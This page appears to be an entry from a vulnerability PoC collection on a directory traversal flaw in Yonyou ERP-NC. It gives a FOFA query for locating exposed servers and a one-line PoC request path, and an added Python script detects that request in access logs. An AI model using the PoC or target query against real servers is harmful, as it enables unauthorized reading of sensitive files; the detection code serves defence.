# Yonyou ERP-NC Directory Traversal Vulnerability

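### Vulnerability Description <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

Yonyou ERP-NC has a directory traversal vulnerability that allows an attacker to obtain sensitive file information by traversing directories.

### Affected Product <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

Yonyou ERP-NC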

### FOFA <a href="#fofa" id="fofa"></a>

```
app="用友-UFIDA-NC"
```

### Vulnerability Reproduction <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

The PoC is:

```
/NCFindWeb?service=IPreAlertConfigService&filename=
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm88_yILyjjHqBUpJS%2F-MhmA0b-z3aRX4j2g4yh%2Fimage.png?alt=media\&token=0a09fa7e-cc0e-4158-940d-44651e5fff3f)

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm88_yILyjjHqBUpJS%2F-MhmA2Nop7oTI0x0h5nD%2Fimage.png?alt=media\&token=0894680d-d6b0-43ad-8c6a-2956dc3d40b6)
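A defender-side check for this request pattern in web access logs, as an added example that is not part of the original page. It assumes common/combined-format access logs; the sample log lines, IP addresses and the `OtherService` name are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: logs are in common/combined access-log format.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def is_ncfindweb_request(target: str) -> bool:
    """True when a request target matches the pattern shown on this page:
    /NCFindWeb with service=IPreAlertConfigService and a filename parameter."""
    parts = urlsplit(target)
    if unquote(parts.path).rstrip("/") != "/NCFindWeb":
        return False
    # keep_blank_values so that an empty "filename=" is still seen.
    query = parse_qs(parts.query, keep_blank_values=True)
    return "IPreAlertConfigService" in query.get("service", []) and "filename" in query

def scan(lines):
    """Return (client_ip, status, target) for every matching log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and is_ncfindweb_request(m.group("target")):
            hits.append((m.group("ip"), int(m.group("status")), m.group("target")))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0800] "GET /NCFindWeb?service=IPreAlertConfigService&filename= HTTP/1.1" 200 1532',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0800] "GET /index.jsp HTTP/1.1" 200 8021',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0800] "GET /NCFindWeb?filename=&service=IPreAlertConfigService HTTP/1.1" 404 0',
    '192.0.2.12 - - [01/Jan/2024:10:02:00 +0800] "GET /NCFindWeb?service=OtherService HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for ip, status, target in scan(SAMPLE_LOG):
        # A 200 status means the server answered the request; review those first.
        print(f"{ip} status={status} {target}")
```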

### Goby & POC <a href="#goby--poc" id="goby--poc"></a>

YongYou ERP-NC directory traversal

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm88_yILyjjHqBUpJS%2F-MhmA80G5QPoTKpfxuEz%2Fimage.png?alt=media\&token=cb5fc234-1f48-49be-a162-18b761897f9f)
